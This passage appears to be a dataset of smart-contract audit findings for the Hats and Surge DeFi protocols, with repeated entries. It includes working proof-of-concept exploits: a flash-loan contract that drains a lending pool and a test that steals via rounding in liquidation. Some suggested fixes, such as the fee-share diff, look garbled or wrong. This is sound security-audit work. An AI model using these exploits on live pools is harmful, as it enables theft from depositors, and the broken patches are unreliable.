result is that, if there are more valid signers than the `targetThreshold` that was set, the threshold will be set higher than intended, and the threshold check in `checkAfterExecution()` will fail for being above the max, causing all safe transactions to revert.\\nThis is a major problem because it cannot necessarily be fixed. In the event that it is a gate with a single hat signer, and the eligibility module for the hat doesn't have a way to turn off eligibility, there will be no way to reduce the number of signers. If this number is greater than `maxSigners`, there is no way to increase `targetThreshold` sufficiently to stop the reverting.\\nThe result is that the safe is permanently bricked, and will not be able to perform any transactions.чIssue Safe can be bricked because threshold is updated with validSignerCount instead of newThreshold\\nChange the value in the function call from `validSignerCount` to `newThreshold`.\\n```\\nif (newThreshold > 0) {\\n// Remove the line below\\n bytes memory data = abi.encodeWithSignature(\"changeThreshold(uint256)\", validSignerCount);\\n// Add the line below\\n bytes memory data = abi.encodeWithSignature(\"changeThreshold(uint256)\", newThreshold);\\n\\n bool success = safe.execTransactionFromModule(\\n address(safe), // to\\n 0, // value\\n data, // data\\n Enum.Operation.Call // operation\\n );\\n\\n if (!success) {\\n revert FailedExecChangeThreshold();\\n }\\n}\\n```\\nчAll transactions will revert until `validSignerCount` can be reduced back below `targetThreshold`, which reч```\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\n```\\n -Changing hat toggle address can lead to unexpected changes in statusчmediumчChanging the toggle address should not change the current status unless intended to. However, in the event that a contract's toggle status hasn't been synced to local state, this change can accidentally toggle the hat back on when it isn't intended.\\nWhen an admin for a hat calls `changeHatToggle()`, the `toggle` address is updated to a new address they entered:\\n```\\nfunction changeHatToggle(uint256 _hatId, address _newToggle) external {\\n if (_newToggle == address(0)) revert ZeroAddress();\\n\\n _checkAdmin(_hatId);\\n Hat storage hat = _hats[_hatId];\\n\\n if (!_isMutable(hat)) {\\n revert Immutable();\\n }\\n\\n hat.toggle = _newToggle;\\n\\n emit HatToggleChanged(_hatId, _newToggle);\\n}\\n```\\n\\nToggle addresses can be either EOAs (who must call `setHatStatus()` to change the local config) or contracts (who must implement the `getHatStatus()` function and return the value).\\nThe challenge comes if a hat has a toggle address that is a contract. The contract changes its toggle value to `false` but is never checked (which would push the update to the local state). The admin thus expects that the hat is turned off.\\nThen, the toggle is changed to an EOA. One would expect that, until a change is made, the hat would remain in the same state, but in this case, the hat defaults back to its local storage state, which has not yet been updated and is therefore set to `true`.\\nEven in the event that the admin knows this and tries to immediately toggle the status back to `false`, it is possible for a malicious user to sandwich their transaction between the change to the EOA and the transaction to toggle the hat off, making use of a hat that should be off. This could have dramatic consequences when hats are used for purposes such as multisig signing.чThe `changeHatToggle()` function needs to call `checkHatToggle()` before changing over to the new toggle address, to ensure that the latest status is synced up.чHats may unexpectedly be toggled from `off` to `on` during toggle address transfer, reactivating hats that are intended to be turned `off`.ч```\\nfunction changeHatToggle(uint256 _hatId, address _newToggle) external {\\n if (_newToggle == address(0)) revert ZeroAddress();\\n\\n _checkAdmin(_hatId);\\n Hat storage hat = _hats[_hatId];\\n\\n if (!_isMutable(hat)) {\\n revert Immutable();\\n }\\n\\n hat.toggle = _newToggle;\\n\\n emit HatToggleChanged(_hatId, _newToggle);\\n}\\n```\\n -Changing hat toggle address can lead to unexpected changes in statusчmediumчChanging the toggle address should not change the current status unless intended to. However, in the event that a contract's toggle status hasn't been synced to local state, this change can accidentally toggle the hat back on when it isn't intended.\\nWhen an admin for a hat calls `changeHatToggle()`, the `toggle` address is updated to a new address they entered:\\n```\\nfunction changeHatToggle(uint256 _hatId, address _newToggle) external {\\n if (_newToggle == address(0)) revert ZeroAddress();\\n\\n _checkAdmin(_hatId);\\n Hat storage hat = _hats[_hatId];\\n\\n if (!_isMutable(hat)) {\\n revert Immutable();\\n }\\n\\n hat.toggle = _newToggle;\\n\\n emit HatToggleChanged(_hatId, _newToggle);\\n}\\n```\\n\\nToggle addresses can be either EOAs (who must call `setHatStatus()` to change the local config) or contracts (who must implement the `getHatStatus()` function and return the value).\\nThe challenge comes if a hat has a toggle address that is a contract. The contract changes its toggle value to `false` but is never checked (which would push the update to the local state). The admin thus expects that the hat is turned off.\\nThen, the toggle is changed to an EOA. One would expect that, until a change is made, the hat would remain in the same state, but in this case, the hat defaults back to its local storage state, which has not yet been updated and is therefore set to `true`.\\nEven in the event that the admin knows this and tries to immediately toggle the status back to `false`, it is possible for a malicious user to sandwich their transaction between the change to the EOA and the transaction to toggle the hat off, making use of a hat that should be off. This could have dramatic consequences when hats are used for purposes such as multisig signing.чThe `changeHatToggle()` function needs to call `checkHatToggle()` before changing over to the new toggle address, to ensure that the latest status is synced up.чHats may unexpectedly be toggled from `off` to `on` during toggle address transfer, reactivating hats that are intended to be turned `off`.ч```\\nfunction changeHatToggle(uint256 _hatId, address _newToggle) external {\\n if (_newToggle == address(0)) revert ZeroAddress();\\n\\n _checkAdmin(_hatId);\\n Hat storage hat = _hats[_hatId];\\n\\n if (!_isMutable(hat)) {\\n revert Immutable();\\n }\\n\\n hat.toggle = _newToggle;\\n\\n emit HatToggleChanged(_hatId, _newToggle);\\n}\\n```\\n -Precision differences when calculating userCollateralRatioMantissa causes major issues for some token pairsчhighчWhen calculating userCollateralRatioMantissa in borrow and liquidate. It divides the raw debt value (in loan token precision) by the raw collateral balance (in collateral precision). This skew is fine for a majority of tokens but will cause issues with specific token pairs, including being unable to liquidate a subset of positions no matter what.\\nWhen calculating userCollateralRatioMantissa, both debt value and collateral values are left in the native precision. As a result of this certain token pairs will be completely broken because of this. Other pairs will only be partially broken and can enter state in which it's impossible to liquidate positions.\\nImagine a token pair like USDC and SHIB. USDC has a token precision of 6 and SHIB has 18. If the user has a collateral balance of 100,001 SHIB (100,001e18) and a loan borrow of 1 USDC (1e6) then their userCollateralRatioMantissa will actually calculate as zero:\\n```\\n1e6 * 1e18 / 100,001e18 = 0\\n```\\n\\nThere are two issues with this. First is that a majority of these tokens simply won't work. The other issue is that because userCollateralRatioMantissa returns 0 there are states in which some debt is impossible to liquidate breaking a key invariant of the protocol.\\nAny token with very high or very low precision will suffer from this.чuserCollateralRatioMantissa should be calculated using debt and collateral values normalized to 18 decimal pointsчSome token pairs will always be/will become brokenч```\\n1e6 * 1e18 / 100,001e18 = 0\\n```\\n -Fee share calculation is incorrectчmediumчFees are given to the feeRecipient by minting them shares. The current share calculation is incorrect and always mints too many shares the fee recipient, giving them more fees than they should get.\\nThe current equation is incorrect and will give too many shares, which is demonstrated in the example below.\\nExample:\\n```\\n_supplied = 100\\n_totalSupply = 100\\n\\n_interest = 10\\nfee = 2\\n```\\n\\nCalculate the fee with the current equation:\\n```\\n_accuredFeeShares = fee * _totalSupply / supplied = 2 * 100 / 100 = 2\\n```\\n\\nThis yields 2 shares. Next calculate the value of the new shares:\\n```\\n2 * 110 / 102 = 2.156\\n```\\n\\nThe value of these shares yields a larger than expected fee. Using a revised equation gives the correct amount of fees:\\n```\\n_accuredFeeShares = (_totalSupply * fee) / (_supplied + _interest - fee) = 2 * 100 / (100 + 10 - 2) = 1.852\\n\\n1.852 * 110 / 101.852 = 2\\n```\\n\\nThis new equation yields the proper fee of 2.чIssue Fee share calculation is incorrect\\nUse the modified equation shown above:\\n```\\n uint fee = _interest * _feeMantissa / 1e18;\\n // 13. Calculate the accrued fee shares\\n- _accruedFeeShares = fee * _totalSupply / _supplied; // if supplied is 0, we will have returned at step 7\\n+ _accruedFeeShares = fee * (_totalSupply * fee) / (_supplied + _interest - fee); // if supplied is 0, we will have returned at step 7\\n // 14. Update the total supply\\n _currentTotalSupply += _accruedFeeShares;\\n```\\nчFee recipient is given more fees than intended, which results in less interest for LPsч```\\n_supplied = 100\\n_totalSupply = 100\\n\\n_interest = 10\\nfee = 2\\n```\\n -Users can borrow all loan tokensчmediumчUtilization rate check can be bypassed depositing additional loan tokens and withdrawing them in the same transaction.\\nIn the `borrow` function it is checked that the new utilization ratio will not be higher than the surge threshold. This threshold prevents borrowers from draining all available liquidity from the pool and also trigger the surge state, which lowers the collateral ratio.\\nA user can bypass this and borrow all available loan tokens following these steps:\\nDepositing the required amount of loan tokens in order to increase the balance of the pool.\\nBorrow the remaining loan tokens from the pool.\\nWithdraw the loan tokens deposited in the first step.\\nThis can be done in one transaction and the result will be a utilization rate of 100%. Even if the liquidity of the pool is high, the required loan tokens to perform the strategy can be borrowed using a flash loan.\\nHelper contract:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport { FlashBorrower, Flashloan, IERC20Token } from \"./FlashLoan.sol\";\\nimport { Pool } from \"./../../src/Pool.sol\";\\n\\ncontract Borrower is FlashBorrower {\\n address public immutable owner;\\n Flashloan public immutable flashLoan;\\n Pool public immutable pool;\\n IERC20Token public loanToken;\\n\\n constructor(Flashloan _flashLoan, Pool _pool) {\\n owner = msg.sender;\\n flashLoan = _flashLoan;\\n pool = _pool;\\n loanToken = IERC20Token(address(_pool.LOAN_TOKEN()));\\n }\\n\\n function borrowAll() public returns (bool) {\\n // Get current values from pool\\n pool.withdraw(0);\\n uint loanTokenBalance = loanToken.balanceOf(address(pool));\\n loanToken.approve(address(pool), loanTokenBalance);\\n\\n // Execute flash loan\\n flashLoan.execute(FlashBorrower(address(this)), loanToken, loanTokenBalance, abi.encode(loanTokenBalance));\\n }\\n\\n function onFlashLoan(IERC20Token token, uint amount, bytes calldata data) public override {\\n // Decode data\\n (uint loanTokenBalance) = abi.decode(data, (uint));\\n\\n // Deposit tokens borrowed from flash loan, borrow all other LOAN tokens from pool and\\n // withdraw the deposited tokens\\n pool.deposit(amount);\\n pool.borrow(loanTokenBalance);\\n pool.withdraw(amount);\\n\\n // Repay the loan\\n token.transfer(address(flashLoan), amount);\\n\\n // Send loan tokens to owner\\n loanToken.transfer(owner, loanTokenBalance);\\n }\\n}\\n```\\n\\nExecution:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport \"forge-std/Test.sol\";\\nimport \"../src/Pool.sol\";\\nimport \"../src/Factory.sol\";\\nimport \"./mocks/Borrower.sol\";\\nimport \"./mocks/ERC20.sol\";\\n\\ncontract PoC is Test {\\n address alice = vm.addr(0x1);\\n address bob = vm.addr(0x2);\\n Factory factory;\\n Pool pool;\\n Borrower borrower;\\n Flashloan flashLoan;\\n MockERC20 collateralToken;\\n MockERC20 loanToken;\\n uint maxCollateralRatioMantissa;\\n uint surgeMantissa;\\n uint collateralRatioFallDuration;\\n uint collateralRatioRecoveryDuration;\\n uint minRateMantissa;\\n uint surgeRateMantissa;\\n uint maxRateMantissa;\\n\\n function setUp() public {\\n factory = new Factory(address(this), \"G\");\\n flashLoan = new Flashloan();\\n collateralToken = new MockERC20(1 ether, 18);\\n collateralToken.transfer(bob, 1 ether);\\n loanToken = new MockERC20(100 ether, 18);\\n loanToken.transfer(alice, 1 ether);\\n loanToken.transfer(address(flashLoan), 99 ether);\\n maxCollateralRatioMantissa = 1e18;\\n surgeMantissa = 0.8e18; // 80%\\n pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), maxCollateralRatioMantissa, surgeMantissa, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n }\\n\\n function testFailBorrowAll() external {\\n // Alice deposits 1 LOAN token\\n vm.startPrank(alice);\\n loanToken.approve(address(pool), 1 ether);\\n pool.deposit(1 ether);\\n vm.stopPrank();\\n\\n // Bob tries to borrow all available loan tokens\\n vm.startPrank(bob);\\n collateralToken.approve(address(pool), 1 ether);\\n pool.addCollateral(bob, 1 ether);\\n pool.borrow(1 ether);\\n vm.stopPrank();\\n }\\n\\n function testBypassUtilizationRate() external {\\n uint balanceBefore = loanToken.balanceOf(bob);\\n\\n // Alice deposits 1 LOAN token\\n vm.startPrank(alice);\\n loanToken.approve(address(pool), 1 ether);\\n pool.deposit(1 ether);\\n vm.stopPrank();\\n\\n // Bob tries to borrow all available loan tokens\\n vm.startPrank(bob);\\n collateralToken.approve(address(pool), 1 ether);\\n borrower = new Borrower(flashLoan, pool);\\n pool.addCollateral(address(borrower), 1 ether);\\n borrower.borrowAll();\\n vm.stopPrank();\\n\\n assertEq(loanToken.balanceOf(bob) - balanceBefore, 1 ether);\\n }\\n}\\n```\\nчA possible solution would be adding a locking period for deposits of loan tokens.\\nAnother possibility is to enforce that the utilization rate was under the surge rate also in the previous snapshot.чThe vulnerability allows to drain all the liquidity from the pool, which entails two problems:\\nThe collateral ratio starts decreasing and only stops if the utilization ratio goes back to the surge threshold.\\nThe suppliers will not be able to withdraw their tokens.\\nThe vulnerability can be executed by the same or other actors every time a loan is repaid or a new deposit is done, tracking the mempool and borrowing any new amount of loan tokens available in the pool, until the collateral ratio reaches a value of zero.\\nA clear case with economic incentives to perform this attack would be that the collateral token drops its price at a high rate and borrow all the available loan tokens from the pool, leaving all suppliers without the chance of withdrawing their share.ч```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport { FlashBorrower, Flashloan, IERC20Token } from \"./FlashLoan.sol\";\\nimport { Pool } from \"./../../src/Pool.sol\";\\n\\ncontract Borrower is FlashBorrower {\\n address public immutable owner;\\n Flashloan public immutable flashLoan;\\n Pool public immutable pool;\\n IERC20Token public loanToken;\\n\\n constructor(Flashloan _flashLoan, Pool _pool) {\\n owner = msg.sender;\\n flashLoan = _flashLoan;\\n pool = _pool;\\n loanToken = IERC20Token(address(_pool.LOAN_TOKEN()));\\n }\\n\\n function borrowAll() public returns (bool) {\\n // Get current values from pool\\n pool.withdraw(0);\\n uint loanTokenBalance = loanToken.balanceOf(address(pool));\\n loanToken.approve(address(pool), loanTokenBalance);\\n\\n // Execute flash loan\\n flashLoan.execute(FlashBorrower(address(this)), loanToken, loanTokenBalance, abi.encode(loanTokenBalance));\\n }\\n\\n function onFlashLoan(IERC20Token token, uint amount, bytes calldata data) public override {\\n // Decode data\\n (uint loanTokenBalance) = abi.decode(data, (uint));\\n\\n // Deposit tokens borrowed from flash loan, borrow all other LOAN tokens from pool and\\n // withdraw the deposited tokens\\n pool.deposit(amount);\\n pool.borrow(loanTokenBalance);\\n pool.withdraw(amount);\\n\\n // Repay the loan\\n token.transfer(address(flashLoan), amount);\\n\\n // Send loan tokens to owner\\n loanToken.transfer(owner, loanTokenBalance);\\n }\\n}\\n```\\n -fund loss because calculated Interest would be 0 in getCurrentState() due to division errorчmediumчfunction `getCurrentState()` Gets the current state of pool variables based on the current time and other functions use it to update the contract state. it calculates interest accrued for debt from the last timestamp but because of the division error in some cases the calculated interest would be 0 and it would cause borrowers to pay no interest.\\nThis is part of `getCurrentState()` code that calculates interest:\\n```\\n // 2. Get the time passed since the last interest accrual\\n uint _timeDelta = block.timestamp - _lastAccrueInterestTime;\\n \\n // 3. If the time passed is 0, return the current values\\n if(_timeDelta == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n \\n // 4. Calculate the supplied value\\n uint _supplied = _totalDebt + _loanTokenBalance;\\n // 5. Calculate the utilization\\n uint _util = getUtilizationMantissa(_totalDebt, _supplied);\\n\\n // 6. Calculate the collateral ratio\\n _currentCollateralRatioMantissa = getCollateralRatioMantissa(\\n _util,\\n _lastAccrueInterestTime,\\n block.timestamp,\\n _lastCollateralRatioMantissa,\\n COLLATERAL_RATIO_FALL_DURATION,\\n COLLATERAL_RATIO_RECOVERY_DURATION,\\n MAX_COLLATERAL_RATIO_MANTISSA,\\n SURGE_MANTISSA\\n );\\n\\n // 7. If there is no debt, return the current values\\n if(_totalDebt == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n\\n // 8. Calculate the borrow rate\\n uint _borrowRate = getBorrowRateMantissa(_util, SURGE_MANTISSA, MIN_RATE, SURGE_RATE, MAX_RATE);\\n // 9. Calculate the interest\\n uint _interest = _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18); // does the optimizer optimize this? or should it be a constant?\\n // 10. Update the total debt\\n _currentTotalDebt += _interest;\\n```\\n\\ncode should support all the ERC20 tokens and those tokens may have different decimals. also different pools may have different values for MIN_RATE, SURGE_RATE, MAX_RATE. imagine this scenario:\\ndebt token is USDC and has 6 digit decimals.\\nMIN_RATE is 5% (2 * 1e16) and MAX_RATE is 10% (1e17) and in current state borrow rate is 5% (5 * 1e16)\\ntimeDelta is 2 second. (two seconds passed from last accrue interest time)\\ntotalDebt is 100M USDC (100 * 1e16).\\neach year has about 31M seconds (31 * 1e6).\\nnow code would calculate interest as: `_totalDebt * _borrowRate * _timeDelta / (365 days * 1e18) = 100 * 1e6 * 5 * 1e16 * 2 / (31 * 1e16 * 1e18) = 5 * 2 / 31 = 0`.\\nso code would calculate 0 interest in each interactions and borrowers would pay 0 interest. the debt decimal and interest rate may be different for pools and code should support all of them.чdon't update contract state(lastAccrueInterestTime) when calculated interest is 0. add more decimal to total debt and save it with extra 1e18 decimals and transferring or receiving debt token convert the token amount to more decimal format or from it.чborrowers won't pay any interest and lenders would lose funds.ч```\\n // 2. Get the time passed since the last interest accrual\\n uint _timeDelta = block.timestamp - _lastAccrueInterestTime;\\n \\n // 3. If the time passed is 0, return the current values\\n if(_timeDelta == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n \\n // 4. Calculate the supplied value\\n uint _supplied = _totalDebt + _loanTokenBalance;\\n // 5. Calculate the utilization\\n uint _util = getUtilizationMantissa(_totalDebt, _supplied);\\n\\n // 6. Calculate the collateral ratio\\n _currentCollateralRatioMantissa = getCollateralRatioMantissa(\\n _util,\\n _lastAccrueInterestTime,\\n block.timestamp,\\n _lastCollateralRatioMantissa,\\n COLLATERAL_RATIO_FALL_DURATION,\\n COLLATERAL_RATIO_RECOVERY_DURATION,\\n MAX_COLLATERAL_RATIO_MANTISSA,\\n SURGE_MANTISSA\\n );\\n\\n // 7. If there is no debt, return the current values\\n if(_totalDebt == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n\\n // 8. Calculate the borrow rate\\n uint _borrowRate = getBorrowRateMantissa(_util, SURGE_MANTISSA, MIN_RATE, SURGE_RATE, MAX_RATE);\\n // 9. Calculate the interest\\n uint _interest = _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18); // does the optimizer optimize this? or should it be a constant?\\n // 10. Update the total debt\\n _currentTotalDebt += _interest;\\n```\\n -A liquidator can gain not only collateral, but also can reduce his own debt!чmediumчA liquidator can gain not only collateral, but also can reduce his own debt. This is achieved by taking advantage of the following vulnerability of the liquidate(): it has a rounding down precision error and when one calls liquidate(Bob, 1), it is possible that the total debt is reduced by 1, but the debt share is 0, and thus Bob's debt shares will not be reduced. In this way, the liquidator can shift part of debt to the remaining borrowers while getting the collateral of the liquidation.\\nIn summary, the liquidator will be able to liquidate a debtor, grab proportionately the collateral, and in addition, reduce his own debt by shifting some of his debt to the other borrowers.\\nBelow, I explain the vulnerability and then show the code POC to demonstate how a liquidator can gain collateral as well as reduce his own debt!\\nThe `liquidate()` function calls `tokenToShares()` at L587 to calculate the number of debt shares for the input `amount`. Note it uses a rounding-down.\\nDue to rounding down, it is possible that while `amount !=0`, the returned number of debt shares could be zero!\\nIn the following code POC, we show that Bob (the test account) and Alice (address(1)) both borrow 1000 loan tokens, and after one year, each of them owe 1200 loan tokens. Bob liquidates Alice's debt with 200 loan tokens. Bob gets the 200 collateral tokens (proportionately). In addition, Bob reduces his own debt from 1200 to 1100!\\nTo run this test, one needs to change `pool.getDebtOf()` as a public function.\\n```\\nfunction testLiquidateSteal() external {\\n uint loanTokenAmount = 12000;\\n uint borrowAmount = 1000;\\n uint collateralAmountA = 10000;\\n uint collateralAmountB = 1400;\\n MockERC20 collateralToken = new MockERC20(collateralAmountA+collateralAmountB, 18);\\n MockERC20 loanToken = new MockERC20(loanTokenAmount, 18);\\n Pool pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), 0.8e18, 0.5e18, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n loanToken.approve(address(pool), loanTokenAmount);\\n pool.deposit(loanTokenAmount);\\n\\n // Alice borrows 1000 \\n collateralToken.transfer(address(1), collateralAmountB);\\n vm.prank(address(1));\\n collateralToken.approve(address(pool), collateralAmountB);\\n vm.prank(address(1));\\n pool.addCollateral(address(1), collateralAmountB);\\n vm.prank(address(1));\\n pool.borrow(borrowAmount);\\n\\n // Bob borrows 1000 too \\n collateralToken.approve(address(pool), collateralAmountA);\\n pool.addCollateral(address(this), collateralAmountA);\\n pool.borrow(borrowAmount);\\n\\n // Bob's debt becomes 1200\\n vm.warp(block.timestamp + 365 days);\\n pool.withdraw(0);\\n uint mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1200); \\n\\n // Alice's debt becomes 1200\\n uint address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1200); \\n assertEq(pool.lastTotalDebt(), 2399); \\n\\n uint myCollateralBeforeLiquidate = collateralToken.balanceOf(address(this));\\n\\n // liquidate 200 for Alice\\n loanToken.approve(address(pool), 200);\\n for(int i; i<200; i++)\\n pool.liquidate(address(1), 1);\\n\\n // Alice's debt shares are NOT reduced, now Bob's debt is reduced to 1100\\n uint debtShares = pool.debtSharesBalanceOf(address(1));\\n assertEq(debtShares, 1000);\\n assertEq(pool.lastTotalDebt(), 2199);\\n address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1100); \\n mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1100); \\n\\n // Bob gains the collateral as well proportionately \\n uint myCollateralAfterLiquidate = collateralToken.balanceOf(address(this));\\n assertEq(myCollateralAfterLiquidate-myCollateralBeforeLiquidate, 200);\\n }\\n```\\nчWe need to double check this edge case and now allowing the liquidate() to proceed when the # of debt shares is Zero.\\n```\\n function liquidate(address borrower, uint amount) external {\\n uint _loanTokenBalance = LOAN_TOKEN.balanceOf(address(this));\\n (address _feeRecipient, uint _feeMantissa) = FACTORY.getFee();\\n ( \\n uint _currentTotalSupply,\\n uint _accruedFeeShares,\\n uint _currentCollateralRatioMantissa,\\n uint _currentTotalDebt\\n ) = getCurrentState(\\n _loanTokenBalance,\\n _feeMantissa,\\n lastCollateralRatioMantissa,\\n totalSupply,\\n lastAccrueInterestTime,\\n lastTotalDebt\\n );\\n\\n uint collateralBalance = collateralBalanceOf[borrower];\\n uint _debtSharesSupply = debtSharesSupply;\\n uint userDebt = getDebtOf(debtSharesBalanceOf[borrower], _debtSharesSupply, _currentTotalDebt);\\n uint userCollateralRatioMantissa = userDebt * 1e18 / collateralBalance;\\n require(userCollateralRatioMantissa > _currentCollateralRatioMantissa, \"Pool: borrower not liquidatable\");\\n\\n address _borrower = borrower; // avoid stack too deep\\n uint _amount = amount; // avoid stack too deep\\n uint _shares;\\n uint collateralReward;\\n if(_amount == type(uint).max || _amount == userDebt) {\\n collateralReward = collateralBalance;\\n _shares = debtSharesBalanceOf[_borrower];\\n _amount = userDebt;\\n } else {\\n uint userInvertedCollateralRatioMantissa = collateralBalance * 1e18 / userDebt;\\n collateralReward = _amount * userInvertedCollateralRatioMantissa / 1e18; // rounds down\\n _shares = tokenToShares(_amount, _currentTotalDebt, _debtSharesSupply, false);\\n }\\n \\n// Add the line below\\n if(_shares == 0) revert ZeroShareLiquidateNotAllowed();\\n\\n _currentTotalDebt -= _amount;\\n\\n // commit current state\\n debtSharesBalanceOf[_borrower] -= _shares;\\n debtSharesSupply = _debtSharesSupply - _shares;\\n collateralBalanceOf[_borrower] = collateralBalance - collateralReward;\\n totalSupply = _currentTotalSupply;\\n lastTotalDebt = _currentTotalDebt;\\n lastAccrueInterestTime = block.timestamp;\\n lastCollateralRatioMantissa = _currentCollateralRatioMantissa;\\n emit Liquidate(_borrower, _amount, collateralReward);\\n if(_accruedFeeShares > 0) {\\n address __feeRecipient = _feeRecipient; // avoid stack too deep\\n balanceOf[__feeRecipient] // Add the line below\\n= _accruedFeeShares;\\n emit Transfer(address(0), __feeRecipient, _accruedFeeShares);\\n }\\n\\n // interactions\\n safeTransferFrom(LOAN_TOKEN, msg.sender, address(this), _amount);\\n safeTransfer(COLLATERAL_TOKEN, msg.sender, collateralReward);\\n }\\n```\\nчA liquidator can gain not only collateral, but also can reduce his own debt. Thus, he effectively steals funding from the pool by off-shifting his debt to the remaining borrowers.ч```\\nfunction testLiquidateSteal() external {\\n uint loanTokenAmount = 12000;\\n uint borrowAmount = 1000;\\n uint collateralAmountA = 10000;\\n uint collateralAmountB = 1400;\\n MockERC20 collateralToken = new MockERC20(collateralAmountA+collateralAmountB, 18);\\n MockERC20 loanToken = new MockERC20(loanTokenAmount, 18);\\n Pool pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), 0.8e18, 0.5e18, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n loanToken.approve(address(pool), loanTokenAmount);\\n pool.deposit(loanTokenAmount);\\n\\n // Alice borrows 1000 \\n collateralToken.transfer(address(1), collateralAmountB);\\n vm.prank(address(1));\\n collateralToken.approve(address(pool), collateralAmountB);\\n vm.prank(address(1));\\n pool.addCollateral(address(1), collateralAmountB);\\n vm.prank(address(1));\\n pool.borrow(borrowAmount);\\n\\n // Bob borrows 1000 too \\n collateralToken.approve(address(pool), collateralAmountA);\\n pool.addCollateral(address(this), collateralAmountA);\\n pool.borrow(borrowAmount);\\n\\n // Bob's debt becomes 1200\\n vm.warp(block.timestamp + 365 days);\\n pool.withdraw(0);\\n uint mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1200); \\n\\n // Alice's debt becomes 1200\\n uint address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1200); \\n assertEq(pool.lastTotalDebt(), 2399); \\n\\n uint myCollateralBeforeLiquidate = collateralToken.balanceOf(address(this));\\n\\n // liquidate 200 for Alice\\n loanToken.approve(address(pool), 200);\\n for(int i; i<200; i++)\\n pool.liquidate(address(1), 1);\\n\\n // Alice's debt shares are NOT reduced, now Bob's debt is reduced to 1100\\n uint debtShares = pool.debtSharesBalanceOf(address(1));\\n assertEq(debtShares, 1000);\\n assertEq(pool.lastTotalDebt(), 2199);\\n address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1100); \\n mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1100); \\n\\n // Bob gains the collateral as well proportionately \\n uint myCollateralAfterLiquidate = collateralToken.balanceOf(address(this));\\n assertEq(myCollateralAfterLiquidate-myCollateralBeforeLiquidate, 200);\\n }\\n```\\n -Precision differences when calculating userCollateralRatioMantissa causes major issues for some token pairsчhighчWhen calculating userCollateralRatioMantissa in borrow and liquidate. It divides the raw debt value (in loan token precision) by the raw collateral balance (in collateral precision). This skew is fine for a majority of tokens but will cause issues with specific token pairs, including being unable to liquidate a subset of positions no matter what.\\nWhen calculating userCollateralRatioMantissa, both debt value and collateral values are left in the native precision. As a result of this certain token pairs will be completely broken because of this. Other pairs will only be partially broken and can enter state in which it's impossible to liquidate positions.\\nImagine a token pair like USDC and SHIB. USDC has a token precision of 6 and SHIB has 18. If the user has a collateral balance of 100,001 SHIB (100,001e18) and a loan borrow of 1 USDC (1e6) then their userCollateralRatioMantissa will actually calculate as zero:\\n```\\n1e6 * 1e18 / 100,001e18 = 0\\n```\\n\\nThere are two issues with this. First is that a majority of these tokens simply won't work. The other issue is that because userCollateralRatioMantissa returns 0 there are states in which some debt is impossible to liquidate breaking a key invariant of the protocol.\\nAny token with very high or very low precision will suffer from this.чuserCollateralRatioMantissa should be calculated using debt and collateral values normalized to 18 decimal pointsчSome token pairs will always be/will become brokenч```\\n1e6 * 1e18 / 100,001e18 = 0\\n```\\n -A liquidator can gain not only collateral, but also can reduce his own debt!чmediumчA liquidator can gain not only collateral, but also can reduce his own debt. This is achieved by taking advantage of the following vulnerability of the liquidate(): it has a rounding down precision error and when one calls liquidate(Bob, 1), it is possible that the total debt is reduced by 1, but the debt share is 0, and thus Bob's debt shares will not be reduced. In this way, the liquidator can shift part of debt to the remaining borrowers while getting the collateral of the liquidation.\\nIn summary, the liquidator will be able to liquidate a debtor, grab proportionately the collateral, and in addition, reduce his own debt by shifting some of his debt to the other borrowers.\\nBelow, I explain the vulnerability and then show the code POC to demonstate how a liquidator can gain collateral as well as reduce his own debt!\\nThe `liquidate()` function calls `tokenToShares()` at L587 to calculate the number of debt shares for the input `amount`. Note it uses a rounding-down.\\nDue to rounding down, it is possible that while `amount !=0`, the returned number of debt shares could be zero!\\nIn the following code POC, we show that Bob (the test account) and Alice (address(1)) both borrow 1000 loan tokens, and after one year, each of them owe 1200 loan tokens. Bob liquidates Alice's debt with 200 loan tokens. Bob gets the 200 collateral tokens (proportionately). In addition, Bob reduces his own debt from 1200 to 1100!\\nTo run this test, one needs to change `pool.getDebtOf()` as a public function.\\n```\\nfunction testLiquidateSteal() external {\\n uint loanTokenAmount = 12000;\\n uint borrowAmount = 1000;\\n uint collateralAmountA = 10000;\\n uint collateralAmountB = 1400;\\n 